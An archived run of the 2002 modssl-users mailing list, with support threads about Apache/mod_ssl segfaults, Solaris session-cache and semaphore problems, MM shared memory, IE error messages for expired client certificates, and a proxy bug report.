X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Sun, 3 Mar 2002, Eric wrote: > Has anyone done this lately? Do I need to rebuild SSL after building 5 > minutes ago? I'm using openssl 0.9.5a and apache_1.3.22+ssl_1.44.tar.gz. Two things: (1) You're using old versions of everything and should upgrade. (2) You're working with Apache-SSL, which is different from mod_ssl, meaning that this is not the right forum to answer your question. You need to ask this question on the Apache-SSL support forum instead. See http://www.apache-ssl.org/ (or you could use mod_ssl instead, then we could help you. :-) Hope this helps, --Cliff Woolley Apache HTTP Server Project ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 4 07:48:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id HAA15537; Mon, 4 Mar 2002 07:47:26 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from chomsky.noc.de id HAA15521; Mon, 4 Mar 2002 07:47:05 +0100 (MET) Received: from [] (IDENT:jlehrke@chomsky.noc.de [192.168.10.2]) (authenticated bits=0) by chomsky.noc.de (8.12.1/8.12.1) with ESMTP id g246kwFL028240 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO) for ; Mon, 4 Mar 2002 07:46:59 +0100 Date: Mon, 04 Mar 2002 07:46:55 +0100 From: Joerg Lehrke To: modssl-users@modssl.org Subject: Re: Constant segmentation fault errors when fetching HTTPS pages Message-ID: <28250000.1015224415@localhost> In-Reply-To: References: X-Mailer: Mulberry/2.2.0b2 (Linux/x86) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Joerg Lehrke X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi Noor, I heard from Ralf Engelschall that there are problems mixing mod_perl and mod_php with mod_ssl (especially on Solaris). Maybe you get the same trouble on FreeBSD. I observed a strange behavior with mod_ssl on Solaris 8 causing bus errors (signal 10) of Apache children. I fixed it with using a different SSLSessionCache implementation (originally shmcb, which seems to be buggy in mod_ssl-2.8.6). Cheers, J"org - --On Sunday, March 03, 2002 01:25:36 PM +0200 Noor Dawod wrote: > I'm contacting you because I'm encountering a bug in recent Apache > 1.3.23 and relevant mod_ssl version. > > I've compiled Apache, mod_ssl and PHP 4.1.2 two days ago, and since then > the error log is filling with Segmentation faults whenever I try to > fetch a page using HTTPS protocol. Same page loads well with no > segmentation faults if using the HTTP protocol. > > It is worth noting that I'm experiencing the same problem when trying to > load server-status for the server too. I don't know what's the > connection. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE8gxhiqBmc6cZoRKwRAnEBAJsGt/f5lWADJ04r/rXGElJgK7eFGQCeO0u7 vv+DRB5kIxlFLoTxqy2qlFY= =dqUW -----END PGP SIGNATURE----- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 4 18:05:18 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA14822; Mon, 4 Mar 2002 18:05:07 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from hr.uoregon.edu id SAA14751; Mon, 4 Mar 2002 18:03:06 +0100 (MET) Received: from PCDAVIDRL (hugo.uoregon.edu [128.223.51.119]) by hr.uoregon.edu (8.11.6/8.11.6) with ESMTP id g24H32828987 for ; Mon, 4 Mar 2002 09:03:03 -0800 From: "David Lechnyr" To: Subject: RE: INSTALL doc reference to MM Shared Memory Library Date: Mon, 4 Mar 2002 09:02:50 -0800 Organization: Human Resources Message-ID: <000c01c1c39e$6af191b0$020a0a0a@PCDAVIDRL> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.3416 Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 In-reply-to: <20020301184426.GA11790@marvin-lnx.int.tele.dk> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "David Lechnyr" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Thanks for the info; ironically I never placed the two names together as the same person (duh). Can anyone speak to the performance gains/etc that they've noticed using MM vs. not using it, and at what point did it make a difference (e.g., threshold). Also under _lower_ traffic conditions, is there a performance penalty for _using_ MM? Thanks, - David Lechnyr > -----Original Message----- > > I'm curious if anyone can provide any background on the > reference in the > > INSTALL doc to the "MM Shared Memory Library" at > > http://www.engelschall.com/sw/mm/. I realize it's listed > as optional, > > however it's still at version 1.1.3 (01-Jul-2000) and I'm a little > > concerned about it's interaction with other processes on > modern kernels > > (2.4/2.5). Can anyone shed some light on this situation? > > > It works fine even with newer kernels - anyway, the author of both > mod_ssl and MM is Ralf Engelschall, so I'm sure that he'll keep MM > updated if it needs to be - so far we don't get any complaints about > MM on the list. > > vh > > Mads Toftum ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 4 18:21:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA16625; Mon, 4 Mar 2002 18:20:46 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from web13405.mail.yahoo.com id SAA16498; Mon, 4 Mar 2002 18:20:07 +0100 (MET) Message-ID: <20020304172005.20796.qmail@web13405.mail.yahoo.com> Received: from [213.132.36.114] by web13405.mail.yahoo.com via HTTP; Mon, 04 Mar 2002 09:20:05 PST Date: Mon, 4 Mar 2002 09:20:05 -0800 (PST) From: Shiva Murugesan Subject: Re: IE browser does not disply proper error message if the certificate is expired To: modssl-users@modssl.org In-Reply-To: <20020303085236.53070.qmail@web13406.mail.yahoo.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Shiva Murugesan X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Dear folks, In other words, when IE 5.0 is communicating with SSL enabled apache, it does not display whenever there is any valid errrors( alerts ) occurs, such as client certificate expired or revoked. It just displays the misleading error "Page cannot be displayed" DNS errors. Sincerly , Shiva --- Shiva Murugesan wrote: > Hello there, > > I have a apache webserver with the following build > details. > > apache 1.3.17 > modssl 2.8.0 > openssl 0.9.6 > > I have set > SSLVerifyClient require in order to make the > browser > to present a certificate. > > If I present a expired certificate in the NE it > comes > back and says "The server rejected the certificate > as > expired". > > Whereas if I do the same in IE 5.5, it comes up with > the stupid error > "The page cannot be displayed". It also displays > when > I present the revoked certificate as well. > > Could anyone help me to show proper error message in > IE, that is of great help. > > Cheers > Shiva > > > > > __________________________________________________ > Do You Yahoo!? > Yahoo! Sports - sign up for Fantasy Baseball > http://sports.yahoo.com > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) > www.modssl.org > User Support Mailing List > modssl-users@modssl.org > Automated List Manager majordomo@modssl.org __________________________________________________ Do You Yahoo!? Yahoo! Sports - sign up for Fantasy Baseball http://sports.yahoo.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 4 19:45:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA21172; Mon, 4 Mar 2002 19:44:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from chomsky.noc.de id TAA21146; Mon, 4 Mar 2002 19:43:24 +0100 (MET) Received: from [] (IDENT:jlehrke@chomsky.noc.de [192.168.10.2]) (authenticated bits=0) by chomsky.noc.de (8.12.1/8.12.1) with ESMTP id g24IhMFL030546 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO) for ; Mon, 4 Mar 2002 19:43:24 +0100 Date: Mon, 04 Mar 2002 19:43:17 +0100 From: Joerg Lehrke To: modssl-users@modssl.org Subject: Re: Problems with apache+ mod_ssl on Solaris 8 Message-ID: <98630000.1015267397@localhost> In-Reply-To: <42330000.1015072556@localhost> References: <42330000.1015072556@localhost> X-Mailer: Mulberry/2.2.0b2 (Linux/x86) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Joerg Lehrke X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, yesterday I wrote a request about problems running Apache with mod_ssl on Solaris. Now I found out more about my problem: All browsers, which support multiple connections within one session (IE, Opera, ...), produce the errors. The only way to stop this problem was do disable the SSLSessionCache feature completely. I found the problem with a normal configuration running on port 443 as well. Do I miss something, or could it be that the problem comes from the fact, that my session cache file was on a Solaris tmpfs file-system? Help wanted! - --On Saturday, March 02, 2002 01:35:56 PM +0100 Joerg Lehrke wrote: > I'm running apache-1.3.23+mod_ssl-2.8.7 compiled with mm-1.1.3 on Solaris > 8. The machine has the recommended patches (Jan/18/02) for Solaris 8 > applied and the semaphore relevant entries on the machine in /etc/system > are: > set semsys:seminfo_semmns=410 > set semsys:seminfo_semmni=70 > set semsys:seminfo_semmsl=210 > set semsys:seminfo_semopm=100 > set semsys:seminfo_semvmx=32767 > > I'm running two Apache instances, one on port 80/443 and the other > instance on 82/445. I found that especially IE5.x can break the running > apache at port 445 first partly (only this client is not getting the > request) and finally even total (no further request is served). > I'm using SSLCipherSuite > ALL:!ADH:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL > > Whenever the problem occurs, the system is running out of semaphores or > something related, because an application using a semaphore produces > warnings during semaphore operations (No space left on device) after a > few requests from IE to apache. This seems to be the reason for the > total breakdown of Apache, too. > > Has anyone observed a similar behavior and maybe a solution to the > problem? > - -- Joerg Lehrke GnuPG-KeyID: C66844AC The Knoc http://k.noc.de/ Bgm.-Haffner-Str. 7, D-87600 Kaufbeuren, Germany Tel +49 8341 874647 GNU -- Protect your freedom! -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE8g8BJqBmc6cZoRKwRAka+AJ0eZUK3oJAH2/o5h8tdAirx1nEk7QCfdjvO LvUruYDYyEvxR0BFNO45wA4= =/bgO -----END PGP SIGNATURE----- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 4 19:58:10 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id TAA21842; Mon, 4 Mar 2002 19:57:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from bulk.resource.org id TAA21822; Mon, 4 Mar 2002 19:56:37 +0100 (MET) Received: from bulk.resource.org (localhost.resource.org [127.0.0.1]) by bulk.resource.org (8.12.2/8.12.2) with ESMTP id g24IuL7Z013534 for ; Mon, 4 Mar 2002 10:56:21 -0800 (PST) Received: (from bburdick@localhost) by bulk.resource.org (8.12.2/8.12.2/Submit) id g24IuLBV013533 for modssl-users@modssl.org; Mon, 4 Mar 2002 10:56:21 -0800 (PST) From: Brad Burdick Message-Id: <200203041856.g24IuLBV013533@bulk.resource.org> Subject: Re: Problems with apache+ mod_ssl on Solaris 8 In-Reply-To: <98630000.1015267397@localhost> To: modssl-users@modssl.org Date: Mon, 4 Mar 2002 10:56:21 -0800 (PST) X-Mailer: ELM [version 2.4ME+ PL94 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Brad Burdick X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Hi, > > yesterday I wrote a request about problems running Apache with mod_ssl on > Solaris. Now I found out more about my problem: > All browsers, which support multiple connections within one session (IE, > Opera, ...), produce the errors. The only way to stop this problem was do > disable the SSLSessionCache feature completely. I found the problem with a > normal configuration running on port 443 as well. > Do I miss something, or could it be that the problem comes from the fact, > that my session cache file was on a Solaris tmpfs file-system? i'm running apache 1.3.23 + mod_ssl 2.8.7-1.3.23 on a solaris 8 sparc without problems. i'm using dbm for the cache, though. SSLSessionCache dbm:logs/ssl_scache SSLSessionCacheTimeout 300 -brad -- Brad Burdick | bburdick@media.org http://media.org/ | The medium is NOT the message ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Mar 4 22:14:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id WAA28393; Mon, 4 Mar 2002 22:13:27 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from chomsky.noc.de id WAA28333; Mon, 4 Mar 2002 22:12:38 +0100 (MET) Received: from [] (IDENT:jlehrke@chomsky.noc.de [192.168.10.2]) (authenticated bits=0) by chomsky.noc.de (8.12.1/8.12.1) with ESMTP id g24LCZFL030698 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO) for ; Mon, 4 Mar 2002 22:12:37 +0100 Date: Mon, 04 Mar 2002 22:12:31 +0100 From: Joerg Lehrke To: modssl-users@modssl.org Subject: Re: Problems with apache+ mod_ssl on Solaris 8 Message-ID: <124320000.1015276351@localhost> In-Reply-To: <200203041856.g24IuLBV013533@bulk.resource.org> References: <200203041856.g24IuLBV013533@bulk.resource.org> X-Mailer: Mulberry/2.2.0b2 (Linux/x86) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Joerg Lehrke X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi Brad, do you also run Solaris 8 with 64 Bit extension? And are you sure, not to have the same problem? Have you ever tried e.g. Opera with 50 concurrent connections configured to get a page with 50 small images. This breaks my Apache with all possible SSLSessionCache-implementations. - --On Monday, March 04, 2002 10:56:21 AM -0800 Brad Burdick wrote: >> Hi, >> >> yesterday I wrote a request about problems running Apache with mod_ssl >> on Solaris. Now I found out more about my problem: >> All browsers, which support multiple connections within one session (IE, >> Opera, ...), produce the errors. The only way to stop this problem was >> do disable the SSLSessionCache feature completely. I found the problem >> with a normal configuration running on port 443 as well. >> Do I miss something, or could it be that the problem comes from the >> fact, that my session cache file was on a Solaris tmpfs file-system? > > i'm running apache 1.3.23 + mod_ssl 2.8.7-1.3.23 on a solaris 8 sparc > without problems. i'm using dbm for the cache, though. > > SSLSessionCache dbm:logs/ssl_scache > SSLSessionCacheTimeout 300 > > > -brad - -- Joerg Lehrke GnuPG-KeyID: C66844AC The Knoc http://k.noc.de/ Bgm.-Haffner-Str. 7, D-87600 Kaufbeuren, Germany Tel +49 8341 874647 GNU -- Protect your freedom! -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE8g+NDqBmc6cZoRKwRAnouAKCZS2EEhWdVqUubMHuYD3EnR7gYuQCgwHxc A4QPjSr6vFFifkmmGAJyU1c= =4lce -----END PGP SIGNATURE----- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 5 00:52:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA06757; Tue, 5 Mar 2002 00:51:25 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from opiate.divisionbyzero.com id AAA06741; Tue, 5 Mar 2002 00:50:59 +0100 (MET) Received: from devotchka.sonicopia.com (adsl-63-194-199-37.dsl.snfc21.pacbell.net [63.194.199.37]) by opiate.divisionbyzero.com (Postfix) with ESMTP id AFB8D6FA5E for ; Mon, 4 Mar 2002 15:53:02 -0800 (PST) Subject: Re: IE browser does not disply proper error message if the certificate is expired From: jon schatz To: modssl-users@modssl.org In-Reply-To: <20020304172005.20796.qmail@web13405.mail.yahoo.com> References: <20020304172005.20796.qmail@web13405.mail.yahoo.com> Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-04vULVHij+aEfomH5/D3" X-Mailer: Evolution/1.0.2 Date: 04 Mar 2002 15:50:08 -0800 Message-Id: <1015285809.9313.9.camel@devotchka.sonicopia.com> Mime-Version: 1.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: jon schatz X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --=-04vULVHij+aEfomH5/D3 Content-Type: text/plain Content-Transfer-Encoding: quoted-printable On Mon, 2002-03-04 at 09:20, Shiva Murugesan wrote: > It just displays the > misleading error "Page cannot be displayed" DNS > errors. if you uncheck "Tools -> Internet Options -> Advanced -> Show Friendly HTTP error messages", you can get more useful info. Unfortunately, the default is to show the same error message for everything. You'll have to change this by hand on your end users' machines (or write an ActiveX control to do it for you). -jon --=20 jon@divisionbyzero.com || www.divisionbyzero.com gpg key: www.divisionbyzero.com/pubkey.asc think i have a virus?: www.divisionbyzero.com/pgp.html "You are in a twisty little maze of Sendmail rules, all confusing."=20 --=-04vULVHij+aEfomH5/D3 Content-Type: application/pgp-signature; name=signature.asc Content-Description: This is a digitally signed message part -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQA8hAgwwj1gFegse14RAl7sAJ404WdhseNge0A5Lx3nf2YA1gHO1gCaApH3 VOmGi/OjWD6GvFv7mEBUr8o= =ow5F -----END PGP SIGNATURE----- --=-04vULVHij+aEfomH5/D3-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 5 00:56:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id AAA06916; Tue, 5 Mar 2002 00:55:23 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from opiate.divisionbyzero.com id AAA06896; Tue, 5 Mar 2002 00:55:09 +0100 (MET) Received: from devotchka.sonicopia.com (adsl-63-194-199-37.dsl.snfc21.pacbell.net [63.194.199.37]) by opiate.divisionbyzero.com (Postfix) with ESMTP id E92AD6FA5E for ; Mon, 4 Mar 2002 15:57:12 -0800 (PST) Subject: Re: IE browser does not disply proper error message if the certificate is expired From: jon schatz To: modssl-users@modssl.org In-Reply-To: <1015285809.9313.9.camel@devotchka.sonicopia.com> References: <20020304172005.20796.qmail@web13405.mail.yahoo.com> <1015285809.9313.9.camel@devotchka.sonicopia.com> Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-jgfJbUmykdaWCMl/KkXQ" X-Mailer: Evolution/1.0.2 Date: 04 Mar 2002 15:54:18 -0800 Message-Id: <1015286059.9313.11.camel@devotchka.sonicopia.com> Mime-Version: 1.0 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: jon schatz X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users --=-jgfJbUmykdaWCMl/KkXQ Content-Type: text/plain Content-Transfer-Encoding: quoted-printable On Mon, 2002-03-04 at 15:50, jon schatz wrote: > if you uncheck "Tools -> Internet Options -> Advanced -> Show Friendly > HTTP error messages", you can get more useful info. Unfortunately, the > default is to show the same error message for everything. You'll have to > change this by hand on your end users' machines (or write an ActiveX > control to do it for you). oops. this is on ie 5.5/6.0. i can't speak for ie 5.0 personally. so ymmv. -jon --=20 jon@divisionbyzero.com || www.divisionbyzero.com gpg key: www.divisionbyzero.com/pubkey.asc think i have a virus?: www.divisionbyzero.com/pgp.html "You are in a twisty little maze of Sendmail rules, all confusing."=20 --=-jgfJbUmykdaWCMl/KkXQ Content-Type: application/pgp-signature; name=signature.asc Content-Description: This is a digitally signed message part -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQA8hAkqwj1gFegse14RAgvPAJ9lj6nOzRwgx0lX8FqBU6yEwLdNeACfUqes b5sf55Uytd1yDFP0ECTBWeY= =cifF -----END PGP SIGNATURE----- --=-jgfJbUmykdaWCMl/KkXQ-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 5 06:06:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id GAA20531; Tue, 5 Mar 2002 06:05:27 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from web13409.mail.yahoo.com id GAA20514; Tue, 5 Mar 2002 06:04:58 +0100 (MET) Message-ID: <20020305050456.53395.qmail@web13409.mail.yahoo.com> Received: from [194.170.10.5] by web13409.mail.yahoo.com via HTTP; Mon, 04 Mar 2002 21:04:56 PST Date: Mon, 4 Mar 2002 21:04:56 -0800 (PST) From: Shiva Murugesan Subject: Re: IE browser does not disply proper error message if the certificate is expired To: modssl-users@modssl.org In-Reply-To: <1015286059.9313.11.camel@devotchka.sonicopia.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Shiva Murugesan X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Many thanks jon. The problem occurs in 5.5 and 6.0 as well. I have tried unchecking the "Show friendly error message", still it is not displaying the correct SSL message. After unchecking, it started asking twice to present the client certificate. After presenting the client certificate for the second time, it displays the standard error message. Ta Shiva --- jon schatz wrote: > On Mon, 2002-03-04 at 15:50, jon schatz wrote: > > if you uncheck "Tools -> Internet Options -> > Advanced -> Show Friendly > > HTTP error messages", you can get more useful > info. Unfortunately, the > > default is to show the same error message for > everything. You'll have to > > change this by hand on your end users' machines > (or write an ActiveX > > control to do it for you). > > oops. this is on ie 5.5/6.0. i can't speak for ie > 5.0 personally. so > ymmv. > > -jon > > -- > jon@divisionbyzero.com || www.divisionbyzero.com > gpg key: www.divisionbyzero.com/pubkey.asc > think i have a virus?: > www.divisionbyzero.com/pgp.html > "You are in a twisty little maze of Sendmail rules, > all confusing." > > ATTACHMENT part 2 application/pgp-signature name=signature.asc __________________________________________________ Do You Yahoo!? Try FREE Yahoo! Mail - the world's greatest free email! http://mail.yahoo.com/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 5 11:06:05 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA06062; Tue, 5 Mar 2002 11:05:09 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from chomsky.noc.de id LAA06030; Tue, 5 Mar 2002 11:04:24 +0100 (MET) Received: from [] (IDENT:jlehrke@chomsky.noc.de [192.168.10.2]) (authenticated bits=0) by chomsky.noc.de (8.12.1/8.12.1) with ESMTP id g25A4Dw8003333 (version=TLSv1/SSLv3 cipher=EDH-RSA-DES-CBC3-SHA bits=168 verify=NO) for ; Tue, 5 Mar 2002 11:04:14 +0100 Date: Tue, 05 Mar 2002 11:04:09 +0100 From: Joerg Lehrke To: modssl-users@modssl.org Subject: Re: Problems with apache+ mod_ssl on Solaris 8 Message-ID: <26860000.1015322649@localhost> In-Reply-To: <200203041856.g24IuLBV013533@bulk.resource.org> References: <200203041856.g24IuLBV013533@bulk.resource.org> X-Mailer: Mulberry/2.2.0b2 (Linux/x86) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Joerg Lehrke X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi Brad, I'm now using the dbm implementation with your settings. First the problem was remaining until I disabled the SSLMutex. Now everything seems to be fine. So my investigations brought up two different problems: 1. At least the shmcb implementation in not clean until mod_ssl 2.8.7 2. The semaphore mechanism raises a dead lock situation under load. Thanks for your help! - --On Monday, March 04, 2002 10:56:21 AM -0800 Brad Burdick wrote: > i'm running apache 1.3.23 + mod_ssl 2.8.7-1.3.23 on a solaris 8 sparc > without problems. i'm using dbm for the cache, though. > > SSLSessionCache dbm:logs/ssl_scache > SSLSessionCacheTimeout 300 > > > -brad - -- Joerg Lehrke GnuPG-KeyID: C66844AC The Knoc http://k.noc.de/ Bgm.-Haffner-Str. 7, D-87600 Kaufbeuren, Germany Tel +49 8341 874647 GNU -- Protect your freedom! -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE8hJgdqBmc6cZoRKwRAoSmAJwMo9WuiUWwMnftdgjB3OXc9hh8BACfZul7 Y2VAVvVbpUFz7vIzc0T2IEw= =zMYI -----END PGP SIGNATURE----- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 5 15:04:21 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA17033; Tue, 5 Mar 2002 15:03:22 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id PAA16968; Tue, 5 Mar 2002 15:02:37 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 332A84CE674; Tue, 5 Mar 2002 15:02:37 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g256GGC62061; Tue, 5 Mar 2002 07:16:16 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id TAA20489; Mon, 4 Mar 2002 19:28:15 +0100 (MET) Date: Mon, 4 Mar 2002 19:28:15 +0100 (MET) Message-Id: <200203041828.TAA20489@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: [BugDB] document contains no data (PR#667) Cc: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Full_Name: santosh Pandey Version: mod_ssl/2.8.7 OS: AIX 4.3 Submission from: (NULL) (208.132.249.249) Hi, Recently, I have installed the mod-ssl aware Apache server and I am able to access my secure and non-secure pages when I type the absolute URL for example https://qwfeeu21.poceur1:5543/products/corp/apps/gecs/Servlet?pathinfo=/ecr/HomePage.html or http://qwfeeu21.poceur1:5580/products/corp/apps/ecs/Servlet?pathinfo=/gets/Entry.html. But in many cases, in my application there is requirement to take the user on intermediate page first ( like customer sign on i.e https://qwfeeu21.poceur1:5543/products/corp/apps/gecs/Servlet?pathinfo=/ecr/CustomerSignOn.html) and then after successfully logon it take the user to requested page (customer maintain screen i.e https://qwfeeu21.poceur1:5543/products/corp/apps/gecs/Servlet?pathinfo=/ecr/SecureAccessReg.html) So, when I type the https://qwfeeu21.poceur1:5543/products/corp/apps/gecs/Servlet?pathinfo=/ecr/SecureAccessReg.html in the address bar and press enter, after few second later browser display the following error Proxy Error The proxy server received an invalid response from an upstream server. The proxy server could not handle the request GET /products/corp/apps/gecs/Servlet. Reason: Document contains no data Apache/1.3.23 Server at qwfeeu21 Port 5543 Though the address bar show the https://qwfeeu21.poceur1:5543/products/corp/apps/gecs/Servlet?pathinfo=/ecr/CustomerSignOn.html which is correct and it should display this page only. But it is strange that it is not displaying page. Though the same application working fine with the Apache-ssl without any problem At the server side I am getting the following error message [Mon Mar 4 13:42:43 2002] [debug] proxy_cache.c(984): No CacheRoot, so no cachi ng. Declining. [Mon Mar 4 13:42:52 2002] [debug] proxy_http.c(580): Content-Type: text/html [Mon Mar 4 13:42:52 2002] [debug] proxy_cache.c(984): No CacheRoot, so no cachi ng. Declining. [Mon Mar 4 13:49:00 2002] [debug] proxy_cache.c(984): No CacheRoot, so no cachi ng. Declining. Could you please advise me what is wrong here. Attached is the config file which I am using for your reference ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Mar 5 17:58:15 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id 